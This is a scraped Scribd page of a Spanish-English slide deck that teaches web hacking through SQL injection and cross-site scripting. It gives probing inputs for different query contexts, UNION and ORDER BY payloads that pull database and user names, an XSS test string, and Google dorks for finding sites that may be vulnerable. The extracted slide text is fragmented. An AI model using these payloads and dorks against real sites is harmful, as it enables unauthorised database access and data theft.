Scribd Logo
Upload

Welcome to Scribd!

  • X Sss QL Injection

    Uploaded by

    Alex Chambi
    40 views23 pages
    Sql para hacking

    Original Title

    x Sss Ql Injection

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Sql para hacking

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    40 views23 pages

    X Sss QL Injection

    Uploaded by

    Alex Chambi
    Sql para hacking

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 23

    Hacking Web

    Cross Site Scripting and SQLInjection

    About me:

    l
    l

    Teoria
    l

    l
    l
    l
    l
    l
    l
    l

    Desarrollo del curso:

    Riesgos

    Conocimientos previos
    Como funciona
    Algunos ataques
    Ejemplos
    Vectores de ataque
    Bypass WAF
    Dorks

    Cross Site Scripting(XSS)


    AND
    SQLInjection

    <script>alert(1);</script>

    l
    l
    l
    l
    l
    l

    inurl:search.php?
    inurl:find.php?
    inurl:search.html
    inurl:find.html
    inurl:search.aspx
    inurl:find.aspx

    DORKS

    DATABASE
    l
    l
    l
    l
    l
    l
    l

    l
    l

    DB servers,
    MySQL(Open source),
    MSSQL,
    MS-ACCESS,
    Oracle,
    Postgre SQL(open source),
    SQLite

    SQL
    Structured Query Language is Known as SQL. In
    order to communicate with the Database . We
    are querying the database so it is called as
    Query language.

    What is SQL Injection?


    l

    Inyeccin SQL es un mtodo comn y famosos


    de la piratera en la actualidad. Algunos novatos
    estn pensando que esto es una cosa pequea
    debido a algnos tipos de software con guin
    como "Havij"

    Ejemplo de una base de datos


    CONSULTAS BASICAS
    select * from table 1
    select column1,column2 from table1
    ------------------------------------------------------CONDICIONES BASICAS PARA
    LIMTIAR LA SALIDA
    Select * from students where id=1
    Select * from students where
    f_name='camaline'

    l
    l
    l
    l
    l
    l
    l

    l
    l
    l
    l
    l

    Si la consulta esta tomando alguna entrada numerica


    select * from table_name where id=1
    select * from table_name where id='1'
    select * from table_name where id="1"
    select * from table_name where id=(1)
    select * from table_name where id=('1')
    select * from table_name where id=("1")

    Si la consulta esta tomando aguna entrada tipo string


    select * from table_name where id='1'
    select * from table_name where id="1"
    select * from table_name where id=('1')
    select * from table_name where id=("1")

    http://pageweb.com/report.php?id=23
    l
    l
    l
    l
    l
    l

    l
    l
    l
    l

    select * from table_name where id=23


    select * from table_name where id='23'
    select * from table_name where id="23"
    select * from table_name where id=(23)
    select * from table_name where id=('23')
    select * from table_name where id=("23")
    ANTES DE COMPROVAR EL TIPO DE
    CONSULTA QUE SE ESTA HACIENDO.
    -- : MySQL Linux Style
    --+ : MySQL Windows Style
    # : Hash (URL encode while use)

    select * from table_name where id=23


    l
    l
    l
    l

    l
    l
    l
    l

    Input

    Reaction if its Intiger Based Injection

    23': It should cause error or no output


    " : Should cause error or no output
    23 or 1=1 : Any Output should come but may be
    different output
    23 and 1=1 : Same output should come
    23 and false: No output
    23 and true : Same Output
    23--+ : Same output. I used --+ to comment, later i ll show
    how to know which one to use
    23 and true--+ : Same output

    select * from table_name where


    id='23'
    l

    l
    l
    l

    l
    l
    l

    Input Reaction if its Single Qoute Based


    Injection
    23' : It should cause error or no output
    23" : No error Same output
    23' or '1'='1 : Any Output should come but may
    be different output
    23' and '1'='1 : Same output should come
    23' and false--+ : No output
    23' and true--+ : Same Output

    select * from table_name where


    id="23"
    l

    l
    l
    l

    l
    l
    l

    Input Reaction if its Double Qoute Based


    Injection
    23' : No error Same output
    23" : >It should cause error or no output
    23" or "1"="1 : Any Output should come but
    may be different output
    23" and "1"="1 : Same output should come
    23" and false--+ : No output
    23" and true--+: Same Output

    select * from table_name where id=(23)


    l

    l
    l
    l

    l
    l
    l

    Input
    Reaction if its Intiger Based Bracket
    enclosed Injection
    23' : It should cause error or no output
    " : Should cause error or no output
    23 or 1=1 : Output should come but may be
    different output
    23 and 1=1 : Output should come but may be
    different output
    23 and false : No output
    23 and true : Same Output
    23--+ : Error or No output. Here you can
    understand that any Bracket is used

    select * from table_name where


    id=('23')
    l

    l
    l
    l

    l
    l
    l
    l

    Input
    Reaction if its bracket enclosed Single
    Quote based Injection
    23' : It should cause error or no output
    23" : No error Same output
    23' or '1'='1 : Any Output should come but may
    be different output
    23' and '1'='1 : Any Output should come but
    may be different output
    23' and false--+ : No output or error
    23' and true--+ : No output or error
    23') and False--+ : No output
    23') and true--+ : Same Output

    select * from table_name where id=("23")


    l

    l
    l
    l

    l
    l
    l
    l

    Input
    Reaction if its bracket enclosed Double
    Quote based Injection
    23' : No error Same output
    23" : Error or No output
    23" or "1"="1 : Any Output should come but
    may be different output
    23" and "1"="1 : Any Output should come but
    may be different output
    23" and false--+ : No output or error
    23" and true--+: No output or error
    23") and False--+ : No output
    23") and true--+ : Same Output

    TRES REGLAS BASICAS DE INYECION


    l
    l
    l

    [1]. Balance.
    [2]. Inject.
    [3]. Commenting.

    Select * from tablename where id='<input>'


    "http://fakesite.com/report.php?id=23' order by 1--+"
    Entonces inyectaremos en el lugar de <input>
    Select * from tablename where id='23' order by 1--+'

    COMO Y POR QUE BUSCAR EL NUMERO DE


    COLUMNAS
    l

    l
    l

    Select f_name,l_name from


    students where id=1
    declaracion UNION
    Select f_name,l_name from
    students where id=1 union
    select f_name,l_name from
    students where id=2

    l
    l
    l
    l

    l
    l
    l
    l

    l
    l
    l
    l

    Select f_name,l_name from students where id=1


    union select 1,2
    f_name
    l_name
    Emily watson
    1
    2
    Select f_name,l_name from students where id=1
    union select 'hello','bye'
    f_name l_name
    Emily watson
    hello bye
    Select f_name,l_name from students where id=1
    union select database(),user()
    f_name
    l_name
    Emily
    watson
    fakedb1 fakeuser@localhost
    Select * from students where id=1 union select
    f_name,l_name from students where id=2

    ORDER BY
    l
    l

    Query
    Output
    select * from students order by 1 : It will output
    all the rows and sort then by the first column
    which is id
    select * from students order by 2 : It will output
    all the rows and sort then by the second column
    which is f_name
    select * from students order by 3 : It will output
    all the rows and sort then by the third column
    which is l_name
    select * from students order by 4 : It will output
    all the rows and sort then by the forth column
    which is roll_no

    XPATH-Error-Based-Injection-Extractvalue
    XPATH-Error-Based-Injection-UpdateXML
    Error-Based-Injection-Subquery-Injection
    Blind-SQL-Injection
    bypass-login-using-sql-injection
    Dump-database-from-login-form-sql
    time-based-blind-injection
    insert-query-injection
    group-by-and-order-by-sql-injection
    Union-based-Oracle-Injection

    Dorks
    l
    l
    l
    l

    inurl:index.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:pageid=

    You might also like